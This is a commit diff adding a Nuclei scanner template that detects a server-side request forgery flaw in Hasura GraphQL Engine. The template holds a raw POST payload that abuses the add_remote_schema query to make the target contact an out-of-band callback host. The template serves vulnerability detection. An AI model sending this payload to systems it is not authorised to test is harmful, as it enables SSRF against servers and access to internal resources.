Merge pull request #1957 from projectdiscovery/hasura-graphql-ssrf

Create hasura-graphql-ssrf.yaml

vulnerabilities/other/hasura-graphql-ssrf.yaml

@@ -0,0 +1,50 @@
+id: hasura-graphql-ssrf
+info:
+  name: Hasura GraphQL Engine - SSRF Side Request Forgery
+  author: princechaddha
+  severity: high
+  reference: https://cxsecurity.com/issue/WLB-2021040115
+  tags: hasura
+
+requests:
+  - raw:
+      - |
+        POST /v1/query HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 381
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        content-type: application/json
+        Accept: */*
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-US,en;q=0.9
+        Connection: close
+
+        {
+           "type":"bulk",
+           "args":[
+              {
+                 "type":"add_remote_schema",
+                 "args":{
+                    "name":"test",
+                    "definition":{
+                       "url":"https://{{interactsh-url}}",
+                       "headers":[
+                       ],
+                       "timeout_seconds":60,
+                       "forward_client_headers":true
+                    }
+                 }
+              }
+           ]
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 400
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"